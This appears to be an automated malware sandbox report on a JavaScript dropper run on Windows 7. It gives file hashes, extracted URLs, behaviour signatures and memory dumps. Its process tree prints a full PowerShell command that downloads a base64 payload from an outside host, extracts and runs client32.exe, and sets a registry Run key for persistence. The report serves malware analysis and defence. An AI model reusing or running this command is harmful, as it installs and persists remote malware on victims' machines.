Analysis

  • max time kernel
    122s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    01/09/2023, 19:59

General

  • Target

    package_details_____________________972968.js

  • Size

    3KB

  • MD5

    bf6b4c0fc43b5aa0c9bb21b94d795240

  • SHA1

    c6826cb6d10ef41842348522571cf28a25720f04

  • SHA256

    9101403bb729cabebd79206aad130293890154cd7a6fba3417471a645ea3ef25

  • SHA512

    173f1ce1ddb6d40d7faa59338a7dcd7a6c97249d467485b890116b84b9cdc480e8825cdeca845c527c6b98b203de898ac827027b56f78a5556429135b965c1e7

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://svirtual.sanviatorperu.edu.pe/readme.txt

exe.dropper

https://svirtual.sanviatorperu.edu.pe/readme.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\package_details_____________________972968.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='https://svirtual.sanviatorperu.edu.pe/readme.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2580

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2580-5-0x000007FEF5380000-0x000007FEF5D1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2580-4-0x000000001B320000-0x000000001B602000-memory.dmp

    Filesize

    2.9MB

  • memory/2580-9-0x0000000002A50000-0x0000000002AD0000-memory.dmp

    Filesize

    512KB

  • memory/2580-8-0x0000000002A50000-0x0000000002AD0000-memory.dmp

    Filesize

    512KB

  • memory/2580-7-0x0000000002670000-0x0000000002678000-memory.dmp

    Filesize

    32KB

  • memory/2580-6-0x0000000002A50000-0x0000000002AD0000-memory.dmp

    Filesize

    512KB

  • memory/2580-10-0x000007FEF5380000-0x000007FEF5D1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2580-11-0x0000000002A50000-0x0000000002AD0000-memory.dmp

    Filesize

    512KB

  • memory/2580-12-0x000007FEF5380000-0x000007FEF5D1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2580-13-0x0000000002A50000-0x0000000002AD0000-memory.dmp

    Filesize

    512KB